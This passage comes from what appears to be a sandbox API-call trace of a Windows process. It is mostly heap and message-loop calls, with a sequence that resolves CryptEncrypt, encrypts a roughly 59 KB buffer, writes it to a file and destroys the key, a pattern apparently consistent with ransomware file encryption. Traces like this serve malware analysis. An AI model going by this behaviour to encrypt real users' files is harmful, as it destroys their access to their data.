hHeap=0x2af0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0206.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0206.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0206.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0206.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0206.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0206.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0206.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabe8 [0206.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0206.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0206.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0206.017] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaacc0 [0206.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0206.017] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0206.017] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.017] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0206.017] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0206.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0206.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0206.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0206.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab0c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0206.032] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xe7e3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xe7e8) returned 1 [0206.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.032] CharLowerBuffW (in: lpsz="byte[59368]", cchLength=0xb | out: lpsz="byte[59368]") returned 0xb [0206.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.033] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.033] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.033] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.033] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.033] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.033] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0206.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0206.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0206.034] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xe7e3, dwBufLen=0xe7e8 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xe7e8) returned 1 [0206.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.036] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0206.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.036] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0206.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.036] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0206.036] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.036] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0206.036] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.036] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.036] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.036] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.036] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.037] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.037] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.042] WriteFile (in: hFile=0x4ac, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xe7e8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xe7e8, lpOverlapped=0x0) returned 1 [0206.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.044] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0206.044] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.044] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0206.044] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.044] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.044] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.044] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0206.044] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.044] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0206.044] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0206.045] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0206.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaabd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0206.045] CryptDestroyKey (hKey=0x9e1db8) returned 1 [0206.045] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.045] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.045] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0206.045] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.045] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0206.045] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.045] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.045] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0206.045] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0206.045] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0206.045] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0206.045] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0206.045] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0206.045] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 